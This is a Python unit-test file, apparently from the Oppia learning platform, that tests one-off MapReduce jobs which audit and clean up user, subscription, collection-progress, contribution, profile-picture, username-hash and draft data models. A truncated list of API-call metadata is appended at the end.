self.user_settings_model.last_started_state_editor_tutorial = (
self.lowest_timestamp + datetime.timedelta(minutes=3))
self.user_settings_model.last_started_state_translation_tutorial = (
self.lowest_timestamp + datetime.timedelta(hours=14))
self.user_settings_model.last_edited_an_exploration = (
self.lowest_timestamp + datetime.timedelta(hours=15))
self.user_settings_model.last_created_an_exploration = (
self.lowest_timestamp + datetime.timedelta(hours=16))
self.user_settings_model.first_contribution_msec = (
utils.get_time_in_millisecs(
self.lowest_timestamp + datetime.timedelta(
hours=10)
)
)
self.user_settings_model.put()
self.user_subscriptions_model = user_models.UserSubscriptionsModel(
id=self.USER_ID_1)
self.user_subscriptions_model.update_timestamps()
self.user_subscriptions_model.last_checked = (
self.lowest_timestamp + datetime.timedelta(hours=1)
)
self.user_subscriptions_model.put()
self.exploration_user_data_model = user_models.ExplorationUserDataModel(
id='%s.%s' % (self.USER_ID_1, self.EXP_ID_ONE),
user_id=self.USER_ID_1,
exploration_id=self.EXP_ID_ONE,
rating=2,
rated_on=self.lowest_timestamp + datetime.timedelta(hours=1),
draft_change_list={'new_content': {}},
draft_change_list_last_updated=(
self.lowest_timestamp + datetime.timedelta(hours=2)),
draft_change_list_exp_version=3,
draft_change_list_id=1
)
self.exploration_user_data_model.update_timestamps()
self.exploration_user_data_model.put()
self.user_contributions_model = user_models.UserContributionsModel(
id=self.USER_ID_1)
self.user_contributions_model.update_timestamps()
self.user_contributions_model.put()
self.user_email_preferences_model = (
user_models.UserEmailPreferencesModel(id=self.USER_ID_1))
self.user_email_preferences_model.update_timestamps()
self.user_email_preferences_model.put()
self.user_stats_model = user_models.UserStatsModel(
id=self.USER_ID_1)
self.user_stats_model.update_timestamps()
self.user_stats_model.put()
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.create_new())
user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob
.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
return eval_output
def test_created_on_having_lowest_value_timestamp_yields_success(self):
self.assertEqual(
self.lowest_timestamp, self.user_settings_model.created_on)
expected_output = [['SUCCESS_ALREADY_UP_TO_DATE', 1]]
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
def test_created_on_within_delta_from_lowest_value_yields_success(self):
self.user_settings_model.update_timestamps(
update_last_updated_time=False)
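        # A five-minute shift is assumed to fall within the delta the audit
        # job tolerates; the next test uses six minutes to cross it.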
self.user_settings_model.created_on += datetime.timedelta(minutes=5)
self.user_settings_model.put()
self.assertLess(
self.lowest_timestamp, self.user_settings_model.created_on)
expected_output = [['SUCCESS_ALREADY_UP_TO_DATE', 1]]
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
def test_created_on_greater_than_delta_from_lowest_value_yields_error(self):
self.user_settings_model.update_timestamps(
update_last_updated_time=False)
self.user_settings_model.created_on += datetime.timedelta(minutes=6)
self.user_settings_model.put()
        # Since last_updated of user_settings_model was never changed, it
        # remains the lowest timestamp value among all attributes.
self.lowest_timestamp = self.user_settings_model.last_updated
self.assertLess(
self.lowest_timestamp,
self.user_settings_model.created_on - datetime.timedelta(minutes=5))
expected_output = [
[
'ERROR_NEED_TO_UPDATE_USING_UserSettingsModel_last_updated',
[self.USER_ID_1]
]]
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
def test_update_for_multiple_users_works_correctly(self):
user_settings_model_2 = (
user_models.UserSettingsModel(
id=self.USER_ID_2,
email=self.EMAIL_2,
)
)
user_settings_model_2.update_timestamps()
user_settings_model_2.created_on += datetime.timedelta(hours=10)
user_settings_model_2.put()
expected_output = [
['SUCCESS_ALREADY_UP_TO_DATE', 1],
[
'ERROR_NEED_TO_UPDATE_USING_UserSettingsModel_last_updated',
[self.USER_ID_2]
]
]
actual_output = self._run_one_off_job()
self.assertItemsEqual(actual_output, expected_output)
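# The tests below exercise the one-off job that removes a user's own id from
# their UserSubscribersModel.subscriber_ids.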
class CleanUpUserSubscribersModelOneOffJobTests(test_utils.GenericTestBase):
def setUp(self):
super(CleanUpUserSubscribersModelOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup('user@email', 'user')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email('user@email')
subscription_services.subscribe_to_creator(self.user_id, self.owner_id)
self.model_instance = user_models.UserSubscribersModel.get_by_id(
self.owner_id)
self.process_and_flush_pending_mapreduce_tasks()
def test_standard_operation(self):
job_id = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output(
job_id))
self.assertEqual(output, [])
def test_migration_job_skips_deleted_model(self):
self.model_instance.subscriber_ids.append(self.owner_id)
self.model_instance.deleted = True
self.model_instance.update_timestamps()
self.model_instance.put()
job_id = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output(
job_id))
self.assertEqual(output, [])
def test_job_removes_user_id_from_subscriber_ids(self):
self.model_instance.subscriber_ids.append(self.owner_id)
self.model_instance.update_timestamps()
self.model_instance.put()
job_id = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output(
job_id))
self.assertEqual(
output, [
'[u\'Removed user from their own subscribers list\', '
'[u\'%s\']]' % self.owner_id])
self.model_instance = user_models.UserSubscribersModel.get_by_id(
self.owner_id)
self.assertTrue(self.user_id in self.model_instance.subscriber_ids)
self.assertTrue(self.owner_id not in self.model_instance.subscriber_ids)
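# The tests below exercise the one-off job that removes exploration ids not
# belonging to the collection from CollectionProgressModel and keeps
# CompletedActivitiesModel in sync with it.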
class CleanUpCollectionProgressModelOneOffJobTests(test_utils.GenericTestBase):
def setUp(self):
super(CleanUpCollectionProgressModelOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.set_admins([self.OWNER_USERNAME])
self.owner = user_services.get_user_actions_info(self.owner_id)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i
) for i in python_utils.RANGE(3)]
collection = collection_domain.Collection.create_default_collection(
'col')
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.publish_exploration(self.owner, exp.id)
collection.add_node(exp.id)
collection_services.save_new_collection(self.owner_id, collection)
rights_manager.publish_collection(self.owner, 'col')
self.signup('user@email', 'user')
self.user_id = self.get_user_id_from_email('user@email')
learner_progress_services.mark_exploration_as_completed(
self.user_id, '0')
collection_services.record_played_exploration_in_collection_context(
self.user_id, 'col', '0')
learner_progress_services.mark_exploration_as_completed(
self.user_id, '1')
collection_services.record_played_exploration_in_collection_context(
self.user_id, 'col', '1')
self.model_instance = user_models.CollectionProgressModel.get_by_id(
'%s.col' % self.user_id)
self.process_and_flush_pending_mapreduce_tasks()
def test_standard_operation(self):
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
self.assertEqual(output, [])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
def test_migration_job_skips_deleted_model(self):
self.model_instance.completed_explorations.append('3')
self.model_instance.deleted = True
self.model_instance.update_timestamps()
self.model_instance.put()
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
self.assertEqual(output, [])
def test_job_cleans_up_exploration_ids_not_present_in_collection(self):
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1'])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
self.model_instance.completed_explorations.append('3')
self.model_instance.update_timestamps()
self.model_instance.put()
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1', '3'])
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
expected_output = [(
'[u\'Added missing exp ids in CompletedActivitiesModel\', '
'[u\'%s.col\']]' % self.user_id
), (
'[u\'Invalid Exploration IDs cleaned from '
'CollectionProgressModel\', '
'[u"Model id: %s.col, Collection id: col, Removed exploration ids: '
'[u\'3\']"]]' % self.user_id)]
self.assertEqual(output, expected_output)
self.model_instance = user_models.CollectionProgressModel.get_by_id(
'%s.col' % self.user_id)
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1', '3'])
def test_job_creates_completed_activities_model_if_it_is_missing(self):
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1'])
completed_activities_model.delete()
self.assertIsNone(
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
self.assertEqual(
output, [
'[u\'Regenerated Missing CompletedActivitiesModel\', '
'[u\'%s.col\']]' % self.user_id])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1'])
def test_job_updates_completed_activities_model_if_exp_ids_do_not_match(
self):
learner_progress_services.mark_exploration_as_completed(
self.user_id, '2')
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1', '2'])
completed_activities_model.exploration_ids = ['0', '2']
completed_activities_model.update_timestamps()
completed_activities_model.put()
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '2'])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
self.assertEqual(
output, [
'[u\'Added missing exp ids in CompletedActivitiesModel\', '
'[u\'%s.col\']]' % self.user_id])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '2', '1'])
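# The tests below exercise the one-off job that removes ids of deleted
# explorations from the created and edited lists in UserContributionsModel.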
class CleanUpUserContributionsModelOneOffJobTests(test_utils.GenericTestBase):
def setUp(self):
super(CleanUpUserContributionsModelOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup('user@email', 'user')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email('user@email')
self.owner = user_services.get_user_actions_info(self.owner_id)
self.user = user_services.get_user_actions_info(self.user_id)
self.save_new_valid_exploration(
'exp0', self.user_id, end_state_name='End')
self.save_new_valid_exploration(
'exp1', self.owner_id, end_state_name='End')
exp_services.update_exploration(
self.user_id, 'exp1', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
rights_manager.publish_exploration(self.user, 'exp0')
rights_manager.publish_exploration(self.owner, 'exp1')
self.process_and_flush_pending_mapreduce_tasks()
def test_standard_operation(self):
job_id = (
user_jobs_one_off
.CleanUpUserContributionsModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output(
job_id))
self.assertEqual(output, [])
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, ['exp0'])
self.assertEqual(
model_instance_1.edited_exploration_ids, ['exp0', 'exp1'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, ['exp1'])
self.assertEqual(
model_instance_2.edited_exploration_ids, ['exp1'])
def test_migration_job_skips_deleted_model(self):
model_instance = user_models.UserContributionsModel.get_by_id(
self.user_id)
model_instance.deleted = True
model_instance.update_timestamps()
model_instance.put()
exp_services.delete_exploration(self.user_id, 'exp0')
job_id = (
user_jobs_one_off
.CleanUpUserContributionsModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output(
job_id))
self.assertEqual(output, [])
def test_job_removes_deleted_exp_from_created_explorations(self):
exp_services.delete_exploration(self.user_id, 'exp0')
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, ['exp0'])
self.assertEqual(
model_instance_1.edited_exploration_ids, ['exp0', 'exp1'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, ['exp1'])
self.assertEqual(
model_instance_2.edited_exploration_ids, ['exp1'])
job_id = (
user_jobs_one_off
.CleanUpUserContributionsModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output(
job_id))
self.assertEqual(
output, [
'[u\'Removed deleted exp ids from UserContributionsModel\', '
'[u"Model id: %s, Removed exploration ids: [u\'exp0\', '
'u\'exp0\']"]]' % self.user_id])
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, [])
self.assertEqual(model_instance_1.edited_exploration_ids, ['exp1'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, ['exp1'])
self.assertEqual(
model_instance_2.edited_exploration_ids, ['exp1'])
def test_job_removes_deleted_exp_from_edited_explorations(self):
exp_services.delete_exploration(self.owner_id, 'exp1')
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, ['exp0'])
self.assertEqual(
model_instance_1.edited_exploration_ids, ['exp0', 'exp1'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, ['exp1'])
self.assertEqual(
model_instance_2.edited_exploration_ids, ['exp1'])
job_id = (
user_jobs_one_off
.CleanUpUserContributionsModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output(
job_id))
removed_exp_list = [
'Model id: %s, Removed exploration ids: '
'[u\'exp1\', u\'exp1\']' % self.owner_id,
'Model id: %s, Removed exploration ids: '
'[u\'exp1\']' % self.user_id]
removed_exp_list.sort()
self.assertEqual(
output, [
'[u\'Removed deleted exp ids from UserContributionsModel\', '
'[u"%s", u"%s"]]' % (removed_exp_list[0], removed_exp_list[1])])
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, ['exp0'])
self.assertEqual(model_instance_1.edited_exploration_ids, ['exp0'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, [])
self.assertEqual(
model_instance_2.edited_exploration_ids, [])
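# The audit below flags profile pictures that are missing, not PNG, of
# non-standard dimensions, or not decodable from their data URL.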
class ProfilePictureAuditOneOffJobTests(test_utils.GenericTestBase):
AUTO_CREATE_DEFAULT_SUPERADMIN_USER = False
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = user_jobs_one_off.ProfilePictureAuditOneOffJob.create_new()
user_jobs_one_off.ProfilePictureAuditOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.ProfilePictureAuditOneOffJob.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
return eval_output
def setUp(self):
super(ProfilePictureAuditOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
user_services.generate_initial_profile_picture(self.owner_id)
def test_correct_profile_picture_has_success_value(self):
user_services.generate_initial_profile_picture(self.owner_id)
output = self._run_one_off_job()
self.assertEqual(output, [['SUCCESS', 1]])
def test_resized_image_has_profile_picture_non_standard_dimensions_error(
self):
user_services.update_profile_picture_data_url(
self.owner_id, image_constants.PNG_IMAGE_WRONG_DIMENSIONS_BASE64)
output = self._run_one_off_job()
self.assertEqual(
output,
[[
'FAILURE - PROFILE PICTURE NON STANDARD DIMENSIONS - 150,160',
[self.OWNER_USERNAME]
]]
)
def test_invalid_image_has_cannot_load_picture_error(self):
user_services.update_profile_picture_data_url(
self.owner_id, image_constants.PNG_IMAGE_BROKEN_BASE64)
output = self._run_one_off_job()
self.assertEqual(
output,
[['FAILURE - CANNOT LOAD PROFILE PICTURE', [self.OWNER_USERNAME]]]
)
def test_non_png_image_has_profile_picture_not_png_error(self):
user_services.update_profile_picture_data_url(
self.owner_id, image_constants.JPG_IMAGE_BASE64)
output = self._run_one_off_job()
self.assertEqual(
output,
[['FAILURE - PROFILE PICTURE NOT PNG', [self.OWNER_USERNAME]]]
)
def test_broken_base64_data_url_has_invalid_profile_picture_data_url_error(
self):
user_services.update_profile_picture_data_url(
self.owner_id, image_constants.BROKEN_BASE64)
output = self._run_one_off_job()
self.assertEqual(
output,
[[
'FAILURE - INVALID PROFILE PICTURE DATA URL',
[self.OWNER_USERNAME]
]]
)
def test_user_without_profile_picture_has_missing_profile_picture_error(
self):
user_services.update_profile_picture_data_url(self.owner_id, None)
output = self._run_one_off_job()
self.assertEqual(
output,
[['FAILURE - MISSING PROFILE PICTURE', [self.OWNER_USERNAME]]]
)
def test_not_registered_user_has_not_registered_value(self):
user_settings_model = (
user_models.UserSettingsModel.get_by_id(self.owner_id))
user_settings_model.username = None
user_settings_model.update_timestamps()
user_settings_model.put()
output = self._run_one_off_job()
self.assertEqual(output, [['SUCCESS - NOT REGISTERED', 1]])
def test_deleted_user_has_deleted_value(self):
user_settings_model = (
user_models.UserSettingsModel.get_by_id(self.owner_id))
user_settings_model.deleted = True
user_settings_model.update_timestamps()
user_settings_model.put()
output = self._run_one_off_job()
self.assertEqual(output, [['SUCCESS - DELETED', 1]])
def test_zero_users_has_no_output(self):
user_models.UserSettingsModel.delete_by_id(self.owner_id)
output = self._run_one_off_job()
self.assertEqual(output, [])
def test_multiple_users_have_correct_values(self):
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
new_user_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.signup(self.MODERATOR_EMAIL, self.MODERATOR_USERNAME)
moderator_id = self.get_user_id_from_email(self.MODERATOR_EMAIL)
user_services.update_profile_picture_data_url(
new_user_id, image_constants.JPG_IMAGE_BASE64)
user_services.update_profile_picture_data_url(editor_id, None)
user_settings_model = (
user_models.UserSettingsModel.get_by_id(moderator_id))
user_settings_model.deleted = True
user_settings_model.update_timestamps()
user_settings_model.put()
output = self._run_one_off_job()
self.assertItemsEqual(
output,
[
['SUCCESS', 1],
['FAILURE - MISSING PROFILE PICTURE', [self.EDITOR_USERNAME]],
['SUCCESS - DELETED', 1],
['FAILURE - PROFILE PICTURE NOT PNG', [self.NEW_USER_USERNAME]]
]
)
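# The audit below checks that hashed normalized usernames are unique; the
# hash function is mocked to force collisions in the failure cases.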
class UniqueHashedNormalizedUsernameAuditJobTests(test_utils.GenericTestBase):
AUTO_CREATE_DEFAULT_SUPERADMIN_USER = False
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob
.create_new())
user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.get_output(
job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
for item in eval_output:
if item[0] == 'FAILURE':
item[1] = sorted(item[1])
return eval_output
def test_audit_user_with_username_is_successful(self):
model = user_models.UserSettingsModel(id='id', email='<EMAIL>')
model.update_timestamps()
model.put()
output = self._run_one_off_job()
self.assertEqual(output, [['SUCCESS USERNAME NONE', 1]])
def test_audit_users_with_different_usernames_is_successful(self):
# Generate 4 different users.
for i in python_utils.RANGE(4):
model = user_models.UserSettingsModel(
id='id%s' % i,
email='<EMAIL>' % i,
normalized_username='username%s' % i
)
model.update_timestamps()
model.put()
output = self._run_one_off_job()
self.assertEqual(output, [])
def test_audit_users_with_different_usernames_all_hashes_same_fails(self):
# Generate 4 different users.
for i in python_utils.RANGE(4):
model = user_models.UserSettingsModel(
id='id%s' % i,
email='<EMAIL>' % i,
normalized_username='username%s' % i
)
model.update_timestamps()
model.put()
def mock_convert_to_hash(*_):
"""Function that takes any number of arguments and returns the
same hash for all inputs.
"""
return 'hashhash'
with self.swap(utils, 'convert_to_hash', mock_convert_to_hash):
output = self._run_one_off_job()
self.assertEqual(
output,
[['FAILURE', ['username%s' % i for i in python_utils.RANGE(4)]]])
def test_audit_users_with_different_usernames_some_hashes_same_fails(self):
# Generate 5 different users.
for i in python_utils.RANGE(5):
model = user_models.UserSettingsModel(
id='id%s' % i,
email='<EMAIL>' % i,
normalized_username='username%s' % i
)
model.update_timestamps()
model.put()
def mock_convert_to_hash(username, _):
"""Function that takes username and returns the same hash for some
usernames and unique hash for others.
"""
if username in ('username1', 'username2'):
return 'hashhash'
return hash(username)
with self.swap(utils, 'convert_to_hash', mock_convert_to_hash):
output = self._run_one_off_job()
self.assertEqual(output, [['FAILURE', ['username1', 'username2']]])
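# The tests below exercise the one-off job that discards exploration drafts
# that are stale or whose exploration no longer exists.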
class DiscardOldDraftsOneOffJobTests(test_utils.GenericTestBase):
EXP_USER_DATA_MODEL_ID = 'user_id.exp_id'
USER_ID = 'user_id'
EXP_ID = 'exp_id'
def setUp(self):
super(DiscardOldDraftsOneOffJobTests, self).setUp()
self.save_new_valid_exploration(self.EXP_ID, self.USER_ID)
def _run_job_and_verify_output(self, expected_output):
"""Runs the DiscardOldDraftsOneOffJob and verifies that the output
matches the expected output.
Args:
expected_output: list(str). The expected output from the one-off
job.
"""
job_id = user_jobs_one_off.DiscardOldDraftsOneOffJob.create_new()
user_jobs_one_off.DiscardOldDraftsOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
actual_output = user_jobs_one_off.DiscardOldDraftsOneOffJob.get_output(
job_id)
self.assertEqual(sorted(actual_output), sorted(expected_output))
def _create_exp_user_data_model(self, draft_change_list, last_updated):
"""Creates a new ExplorationUserDataModel with the given parameters.
Args:
draft_change_list: list(dict)|None. The change list corresponding
to the user's draft for this exploration, or None if there is
no such draft.
last_updated: datetime.datetime. When the draft was last updated.
"""
user_models.ExplorationUserDataModel(
id=self.EXP_USER_DATA_MODEL_ID,
user_id=self.USER_ID,
exploration_id=self.EXP_ID,
rating=2,
rated_on=datetime.datetime(2018, 1, 1),
draft_change_list=draft_change_list,
draft_change_list_last_updated=last_updated,
draft_change_list_exp_version=3,
draft_change_list_id=1
).put()
def test_models_without_drafts_are_ignored(self):
self._create_exp_user_data_model(None, None)
self._run_job_and_verify_output([])
def test_draft_left_alone_if_it_is_current(self):
self._create_exp_user_data_model(
{'new_content': {}}, datetime.datetime(2021, 1, 1))
self._run_job_and_verify_output([])
def test_draft_discarded_if_exploration_is_missing(self):
exp_services.delete_exploration(self.USER_ID, self.EXP_ID)
self._create_exp_user_data_model(
{'new_content': {}}, datetime.datetime(2021, 1, 1))
old_model = user_models.ExplorationUserDataModel.get_by_id(
self.EXP_USER_DATA_MODEL_ID)
self.assertIsNotNone(old_model.draft_change_list)
self.assertIsNotNone(old_model.draft_change_list_last_updated)
self.assertIsNotNone(old_model.draft_change_list_exp_version)
self._run_job_and_verify_output([
'[u\'DISCARDED - Exploration is missing\', [u\'%s\']]' %
self.EXP_USER_DATA_MODEL_ID,
'[u\'SUCCESS - Discarded draft\', 1]'
])
new_model = user_models.ExplorationUserDataModel.get_by_id(
self.EXP_USER_DATA_MODEL_ID)
self.assertLess(old_model.last_updated, new_model.last_updated)
self.assertIsNone(new_model.draft_change_list)
self.assertIsNone(new_model.draft_change_list_last_updated)
self.assertIsNone(new_model.draft_change_list_exp_version)
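    # A draft last updated in 2017 is assumed to be past the job's staleness
    # cutoff; a 2021 draft is treated as current in the test further above.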
def test_draft_discarded_if_it_is_too_old(self):
self._create_exp_user_data_model(
{'new_content': {}}, datetime.datetime(2017, 1, 1))
old_model = user_models.ExplorationUserDataModel.get_by_id(
self.EXP_USER_DATA_MODEL_ID)
self.assertIsNotNone(old_model.draft_change_list)
self.assertIsNotNone(old_model.draft_change_list_last_updated)
self.assertIsNotNone(old_model.draft_change_list_exp_version)
self._run_job_and_verify_output([
'[u\'DISCARDED - Draft is old\', [u\'%s\']]' %
self.EXP_USER_DATA_MODEL_ID,
'[u\'SUCCESS - Discarded draft\', 1]'
])
new_model = user_models.ExplorationUserDataModel.get_by_id(
self.EXP_USER_DATA_MODEL_ID)
self.assertLess(old_model.last_updated, new_model.last_updated)
self.assertIsNone(new_model.draft_change_list)
self.assertIsNone(new_model.draft_change_list_last_updated)
self.assertIsNone(new_model.draft_change_list_exp_version)
| [
"core.domain.user_jobs_one_off.UserContributionsOneOffJob.enqueue",
"core.domain.collection_services.delete_collection",
"core.domain.event_services.StartExplorationEventHandler.record",
"core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new",
"core.domain.user_jobs_one_off.UsernameL... | [((1712, 1835), 'core.platform.models.Registry.import_models', 'models.Registry.import_models', (['[models.NAMES.auth, models.NAMES.user, models.NAMES.feedback, models.NAMES.\n exploration]'], {}), '([models.NAMES.auth, models.NAMES.user, models\n .NAMES.feedback, models.NAMES.exploration])\n', (1741, 1835), False, 'from core.platform import models\n'), ((1872, 1915), 'core.platform.models.Registry.import_datastore_services', 'models.Registry.import_datastore_services', ([], {}), '()\n', (1913, 1915), False, 'from core.platform import models\n'), ((1934, 1974), 'core.platform.models.Registry.import_search_services', 'models.Registry.import_search_services', ([], {}), '()\n', (1972, 1974), False, 'from core.platform import models\n'), ((34625, 34667), 'core.domain.user_services.get_current_date_as_string', 'user_services.get_current_date_as_string', ([], {}), '()\n', (34665, 34667), False, 'from core.domain import user_services\n'), ((2474, 2531), 'core.domain.user_jobs_one_off.UserContributionsOneOffJob.create_new', 'user_jobs_one_off.UserContributionsOneOffJob.create_new', ([], {}), '()\n', (2529, 2531), False, 'from core.domain import user_jobs_one_off\n'), ((2540, 2600), 'core.domain.user_jobs_one_off.UserContributionsOneOffJob.enqueue', 'user_jobs_one_off.UserContributionsOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (2592, 2600), False, 'from core.domain import user_jobs_one_off\n'), ((8494, 8560), 'core.domain.user_jobs_one_off.UsernameLengthDistributionOneOffJob.create_new', 